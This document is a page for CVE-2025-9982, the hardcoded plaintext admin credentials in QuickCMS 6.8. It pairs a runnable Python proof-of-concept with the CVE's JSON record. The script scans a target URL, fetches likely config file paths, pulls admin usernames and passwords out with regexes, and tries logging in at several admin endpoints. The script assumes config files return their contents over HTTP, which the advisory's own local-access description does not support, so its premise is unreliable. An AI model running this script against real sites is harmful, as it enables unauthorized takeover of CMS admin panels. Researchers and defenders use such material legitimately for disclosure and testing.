CVE-2025-9982

#!/usr/bin/env python3 """ CVE-2025-9982 PoC - QuickCMS 6.8 Hardcoded Admin Credentials This PoC demonstrates how to extract hardcoded credentials from QuickCMS config files. """ import requests import re import sys def check_quickcms_version(target_url): """Check if target is running QuickCMS and get version""" try: response = requests.get(target_url, timeout=10) # Check for QuickCMS indicators if 'quick' in response.text.lower() or 'quickcms' in response.text.lower(): # Try to find version number version_match = re.search(r'QuickCMS\s*v?([\d.]+)', response.text, re.I) if version_match: return version_match.group(1) return "Unknown" except Exception as e: print(f"[-] Error checking version: {e}") return None def extract_config_file(target_url, config_paths): """Try to extract hardcoded credentials from config files""" credentials = {} for config_path in config_paths: url = target_url.rstrip('/') + '/' + config_path try: response = requests.get(url, timeout=10) if response.status_code == 200: # Look for hardcoded credentials patterns admin_user = re.search(r"['\"](?:admin_username|admin_user|username)['\"]\s*[=:]\s*['\"]([^'\"]+)['\"]", response.text) admin_pass = re.search(r"['\"](?:admin_password|admin_pass|password)['\"]\s*[=:]\s*['\"]([^'\"]+)['\"]", response.text) if admin_user and admin_pass: credentials['username'] = admin_user.group(1) credentials['password'] = admin_pass.group(1) print(f"[+] Found hardcoded credentials in {config_path}") print(f" Username: {credentials['username']}") print(f" Password: {credentials['password']}") return credentials except Exception as e: print(f"[-] Error accessing {config_path}: {e}") return None def try_admin_login(target_url, username, password): """Try to login to admin panel with extracted credentials""" admin_urls = [ target_url.rstrip('/') + '/admin', target_url.rstrip('/') + '/admin.php', target_url.rstrip('/') + '/cms-admin' ] for admin_url in admin_urls: try: # Typical QuickCMS admin login request login_data = { 'login': username, 'password': password, 'action': 'login' } response = requests.post(admin_url, data=login_data, timeout=10, allow_redirects=False) # Check for successful login indicators if response.status_code in [200, 302]: if 'admin' in response.text.lower() or 'dashboard' in response.text.lower() or response.status_code == 302: print(f"[+] Successfully logged in at {admin_url}") return True except Exception as e: continue return False def main(): if len(sys.argv) < 2: print("Usage: python3 cve-2025-9982-poc.py <target_url>") print("Example: python3 cve-2025-9982-poc.py http://target.com") sys.exit(1) target_url = sys.argv[1] print(f"[*] Checking target: {target_url}") # Common QuickCMS config file paths config_paths = [ 'config.php', 'data/config.php', 'cms/data/config.php', 'includes/config.php', 'admin/config.php' ] # Extract credentials print("[*] Searching for config files with hardcoded credentials...") creds = extract_config_file(target_url, config_paths) if creds: print("\n[*] Attempting to login to admin panel...") if try_admin_login(target_url, creds['username'], creds['password']): print("[+] VULNERABLE: Hardcoded credentials work!") else: print("[-] Credentials found but login failed (may need different endpoint)") else: print("[-] No hardcoded credentials found in common config paths") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-9982", "sourceIdentifier": "[email protected]", "published": "2025-11-14T14:15:47.113", "lastModified": "2025-11-17T19:28:12.123", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in QuickCMS version 6.8 where sensitive admin credentials are hardcoded in a configuration file and stored in plaintext. This flaw allows attackers with access to the source code or the server file system to retrieve authentication details, potentially leading to privilege escalation.\n\nThe vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.8 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-256"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensolution:quick.cms:6.8:*:*:*:*:*:*:*", "matchCriteriaId": "D38DD588-2254-48CA-922B-A803E730F60E"}]}]}], "references": [{"url": "https://cert.pl/posts/2025/11/CVE-2025-9982", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://opensolution.org/cms-system-quick-cms.html", "source": "[email protected]", "tags": ["Product"]}]}}